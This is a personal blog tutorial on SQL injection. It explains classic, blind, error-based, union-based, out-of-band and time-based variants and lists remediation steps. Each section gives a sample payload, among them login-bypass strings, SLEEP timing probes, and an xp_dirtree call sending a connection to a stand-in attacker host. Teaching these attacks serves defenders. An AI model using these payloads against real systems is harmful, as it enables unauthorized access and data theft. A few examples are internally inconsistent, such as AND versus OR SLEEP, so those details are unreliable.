<!DOCTYPE html><html class="appearance-dark" lang="en"><head><meta charset="UTF-8"><title>SQL Injection</title><meta name="description" content="You are born original, don't die as a copy."><meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no, initial-scale=1"><!-- Google Analytics --><!-- End Google Analytics -->
<!-- Baidu Analytics --><!-- End Baidu Analytics --><link rel="icon" href="/images/favicon.png"><link rel="stylesheet" href="/style/common/bulma.css"><link rel="stylesheet" href="/style/base.css"><link rel="stylesheet" href="/style/common/helper.css"><script src="/js/common.js"></script><link rel="stylesheet" href="/style/post.css"><link rel="stylesheet" href="/style/themes/highlight-theme-light.css"><link rel="stylesheet" href="/style/common/jquery.fancybox.min.css"><script src="/js/highlight.pack.js"></script><meta name="description" content="
SQL InjectionSQL injection (SQLi) is a web application injection vulnerability that occurs when an attacker injects malicious SQL statements into an application’s input fields.
This occurs when a web application does not properly validate user input, allowing an attacker to inject SQL code&amp;#x2F;queries that can manipulate the database or gain access to se.."><meta name="generator" content="Hexo 7.1.1"></head><body class="is-flex is-flex-direction-column"><header class="header-widget is-flex-shrink-0 is-hidden-mobile"><div class="container is-fullhd is-flex is-justify-content-space-between is-align-items-center is-full-height"><section class="is-hidden-mobile is-flex-shrink-0"><h2><a href="/">Razvan's blog</a></h2></section><h3 class="is-hidden-mobile is-family-serif is-full-height is-flex is-align-items-center is-flex-shrink-0"><div class="is-full-height" id="postTopic"><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">SQL Injection</p><p class="is-full-height is-flex-shrink-0 is-flex is-align-items-center is-justify-content-center">Click back to the top</p></div></h3><aside class="is-flex-shrink-0"><h3 class="is-inline-block"><a href="/">Home</a></h3><h3 class="is-inline-block"><a href="/about">About</a></h3><h3 class="is-inline-block"><a href="/archives">Archives</a></h3></aside></div></header><header class="is-flex header-widget is-flex-shrink-0 is-align-items-center is-justify-content-center is-hidden-tablet"><h3 class="is-inline-block"><a href="/">Home</a></h3><h3 class="is-inline-block"><a href="/about">About</a></h3><h3 class="is-inline-block"><a href="/archives">Archives</a></h3></header><main><main class="container is-max-widescreen content section post-page pt-4 px-4"><div class="columns is-flex-desktop is-justify-content-center is-flex-direction-row-reverse"><div class="column is-3 is-hidden-mobile"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#SQL-Injection"><span class="toc-text">SQL Injection</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Types-of-SQL-Injection"><span class="toc-text">Types of SQL Injection:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Examples"><span class="toc-text">Examples:</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Classic-SQL-Injection"><span class="toc-text">Classic SQL Injection:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Blind-SQL-Injection"><span class="toc-text">Blind SQL Injection:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Error-based-SQL-Injection"><span class="toc-text">Error-based SQL Injection:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Union-based-SQL-Injection"><span class="toc-text">Union-based SQL Injection:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Out-of-Band-SQL-Injection"><span class="toc-text">Out-of-Band SQL Injection:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Time-based-SQL-Injection"><span class="toc-text">Time-based SQL Injection:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#SQLi-Remediation"><span class="toc-text">SQLi Remediation :</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Conclusion"><span class="toc-text">Conclusion</span></a></li></ol></li></ol></li></ol></div><div class="column is-9"><header class="my-4"><a href="/tags/WEB"><i class="tag post-item-tag">WEB</i></a></header><h1 class="mt-0 mb-1 is-family-serif" id="postTitle">SQL Injection</h1><time class="has-text-grey" datetime="2024-04-10T15:41:46.000Z">2024-04-10</time><article class="mt-2 post-content"><p><img src="/../images/SQLi.webp" alt="alt text"></p>
<h1 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h1><p>SQL injection (SQLi) is a web application injection vulnerability that occurs when an attacker injects malicious SQL statements into an application’s input fields.</p>
<p>This occurs when a web application does not properly validate user input, allowing an attacker to inject SQL code&#x2F;queries that can manipulate the database or gain access to sensitive information.</p>
<p>For example, suppose a website has a login form that accepts a username and password. If the website does not properly validate the user’s input, an attacker could enter a malicious SQL statement into the username field that would allow them to bypass the login process and gain access to the website’s database.</p>
<p>What damage can it do ? </p>
<p>SQL injection attacks can have serious consequences, including the theft of sensitive data, unauthorized access to sensitive systems, and even full system compromise.</p>
<h3 id="Types-of-SQL-Injection"><a href="#Types-of-SQL-Injection" class="headerlink" title="Types of SQL Injection:"></a>Types of SQL Injection:</h3><p>SQL injection attacks can manifest in various forms, depending on the specific vulnerability and the attacker’s goals. Some common types of SQL injection include:</p>
<ol>
<li><p><code>Classic SQL Injection</code>: In classic SQL injection, attackers insert malicious SQL statements into input fields, such as login forms or search boxes, to manipulate the database. This can involve altering the logic of the original query, extracting sensitive information, or even modifying or deleting database records.</p>
</li>
<li><p><code>Blind SQL Injection</code>: In blind SQL injection, attackers exploit vulnerabilities without directly viewing the results of their actions. Instead, they rely on the application’s behavior to infer information indirectly. This can involve techniques like time-based blind injection or boolean-based blind injection.</p>
</li>
<li><p><code>Error-based SQL Injection</code>: Error-based SQL injection exploits error messages generated by the database server to extract information about the database structure or the data itself. Attackers inject SQL code that triggers errors revealing details they can exploit.</p>
</li>
<li><p><code>Union-based SQL Injection</code>: Union-based SQL injection involves injecting a SELECT statement that includes a UNION operator into an SQL query to combine the results of two queries. This technique can be used to extract data from other tables or even execute arbitrary SQL commands.</p>
</li>
<li><p><code>Out-of-Band SQL Injection</code>: Out-of-band SQL injection leverages features of the database server to communicate with the attacker’s server and transmit data. This can be useful when direct retrieval of data is not possible due to network restrictions or other security measures.</p>
</li>
<li><p><code>Time-based SQL Injection</code>: Time-based SQL injection involves injecting SQL queries that cause the server to delay its response. Attackers can exploit this delay to infer information indirectly, such as determining whether a certain condition is true or false.</p>
</li>
</ol>
<h2 id="Examples"><a href="#Examples" class="headerlink" title="Examples:"></a>Examples:</h2><h3 id="Classic-SQL-Injection"><a href="#Classic-SQL-Injection" class="headerlink" title="Classic SQL Injection:"></a>Classic SQL Injection:</h3><p>Imagine a login form where users input their username and password. An attacker might input ‘ OR 1&#x3D;1 – in the username field. If the application doesn’t properly sanitize inputs, the SQL query might become:</p>
<div style="background-color: ##28282B; padding: 10px; border: 1px solid #ccc;">
SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'input_password';
</div>

<p>This query always returns true, allowing the attacker to log in without a valid password.</p>
<h3 id="Blind-SQL-Injection"><a href="#Blind-SQL-Injection" class="headerlink" title="Blind SQL Injection:"></a>Blind SQL Injection:</h3><p>Suppose there’s a login form on a website where users enter their username and password. The website’s login process checks the entered credentials against a database using an SQL query like this:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE username = &#x27;input_username&#x27; AND password = &#x27;input_password&#x27;;</span><br></pre></td></tr></table></figure>

<p>Now, let’s say an attacker wants to bypass the login and gain unauthorized access to the website’s backend. They notice that the website is vulnerable to Blind SQL Injection. Instead of directly viewing the results of their injected SQL queries, the attacker will rely on the application’s behavior to infer information indirectly.</p>
<p>The attacker inputs the following string into the username field of the login form:</p>
<div style="background-color: ##28282B; padding: 10px; border: 1px solid #ccc;">
' AND SLEEP(10) --'
</div>

<p>If the website takes significantly longer to respond, the attacker infers that the injected condition was true.</p>
<p>This input modifies the SQL query executed by the application to become:</p>
<div style="background-color: ##28282B; padding: 10px; border: 1px solid #ccc;">
SELECT * FROM users WHERE username = '' OR SLEEP(10) -- ' AND password = 'input_password';
</div>

<h3 id="Error-based-SQL-Injection"><a href="#Error-based-SQL-Injection" class="headerlink" title="Error-based SQL Injection:"></a>Error-based SQL Injection:</h3><p>Consider a website that shows a detailed error message when encountering a database error. An attacker might input:</p>
<div style="background-color: ##28282B; padding: 10px; border: 1px solid #ccc;">
' OR 1=1 UNION SELECT 1, @@VERSION --
</div>

<p>If the application displays database errors, it might reveal the database version, aiding the attacker.</p>
<h3 id="Union-based-SQL-Injection"><a href="#Union-based-SQL-Injection" class="headerlink" title="Union-based SQL Injection:"></a>Union-based SQL Injection:</h3><p>Suppose there’s a URL parameter id used in a query like:</p>
<div style="background-color: ##28282B; padding: 10px; border: 1px solid #ccc;">
http://example.com/page?id=1 UNION SELECT 1,2,3 --
</div>

<p>If the application concatenates this input into an SQL query without proper validation, it may combine the attacker’s selected columns with the original query’s result.</p>
<h3 id="Out-of-Band-SQL-Injection"><a href="#Out-of-Band-SQL-Injection" class="headerlink" title="Out-of-Band SQL Injection:"></a>Out-of-Band SQL Injection:</h3><p>If the database server allows outbound connections, an attacker might craft a payload that triggers a DNS lookup or an HTTP request to their controlled server. For example:</p>
<div style="background-color: ##28282B; padding: 10px; border: 1px solid #ccc;">
'; EXEC xp_dirtree '\\attacker.com\share\' --
</div>

<p>This could trigger a connection to the attacker’s server, revealing information or performing actions.</p>
<h3 id="Time-based-SQL-Injection"><a href="#Time-based-SQL-Injection" class="headerlink" title="Time-based SQL Injection:"></a>Time-based SQL Injection:</h3><p>Similar to blind SQL injection, but instead of inferring information from response times, an attacker uses queries that introduce delays. For instance:</p>
<div style="background-color: ##28282B; padding: 10px; border: 1px solid #ccc;">
' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(10),0) --
</div>

<p>If the delay occurs, the attacker deduces that the condition was true.</p>
<h3 id="SQLi-Remediation"><a href="#SQLi-Remediation" class="headerlink" title="SQLi Remediation :"></a>SQLi Remediation :</h3><ul>
<li><p>Use parameterized queries or prepared statements.</p>
</li>
<li><p>Validate and sanitize user inputs.</p>
</li>
<li><p>Limit database user privileges.</p>
</li>
<li><p>Conduct regular security audits.</p>
</li>
<li><p>Implement web application firewalls (WAFs).</p>
</li>
<li><p>Educate developers on secure coding.</p>
</li>
<li><p>Monitor and log SQL queries.</p>
</li>
<li><p>Keep software updated.</p>
</li>
</ul>
<h3 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h3><p>SQL injection (SQLi) remains a critical security threat for web applications, allowing attackers to manipulate databases and compromise sensitive data. Understanding the various types of SQL injection attacks, such as classic, blind, and time-based, is crucial for effective mitigation. Implementing remediation strategies like parameterized queries, input validation, and least privilege principles are essential steps towards bolstering application security. By staying vigilant, educating developers, and regularly auditing code for vulnerabilities, organizations can minimize the risk of SQL injection and safeguard their systems from exploitation.</p>
</article><section class="jump-container is-flex is-justify-content-space-between my-6"><!-- em is empty placeholder--><em></em><a class="button is-default" href="/2024/04/08/XSS/" title="Cross-Site Scripting (XSS)"><span class="has-text-weight-semibold">Next: Cross-Site Scripting (XSS)</span><i class="iconfont icon-next ml-2 has-text-grey"></i></a></section><article class="mt-6 comment-container"><script async repo="Haojen/Claudia-theme-blog" src="https://utteranc.es/client.js" issue-term="pathname" theme="preferred-color-scheme"></script></article></div></div></main></main><footer class="is-flex is-flex-direction-column is-align-items-center is-flex-shrink-0 is-family-serif"><section class="sns-container"><!-- Github--><a title="github" target="_blank" rel="noopener nofollow" href="//github.com/rvz25"><i class="iconfont icon-github"></i></a><!-- Ins--><!-- RSS--><!-- 知乎--><!-- 领英--><a title="linkedin" target="_blank" rel="noopener nofollow" href="//www.linkedin.com/in/razvan-popa-333740293"><i class="iconfont icon-linkedin"></i></a><!-- 脸书--></section><p><span>Copyright ©</span><span> Razvan 2024</span></p><div class="is-flex is-justify-content-center is-flex-wrap-wrap"><p>Powered by Hexo &verbar;&nbsp;</p><p class="is-flex is-justify-content-center"><a title="Hexo theme author" target="_blank" rel="noopener" href="//github.com/haojen">Theme by Haojen&nbsp;</a></p><div style="margin-top: 2px"><a class="github-button" title="github-button" target="_blank" rel="noopener" href="https://github.com/haojen/hexo-theme-Claudia" data-color-scheme="no-preference: light; light: light; dark: dark;" data-show-count="true"></a></div></div><div><span></span></div></footer><script async defer src="https://buttons.github.io/buttons.js"></script><script src="/js/jquery-3.6.1.min.js"></script><script src="/js/jquery-fancybox.min.js"></script><script src="/js/img_zoom.js"></script><script src="/js/post.js"></script></body></html>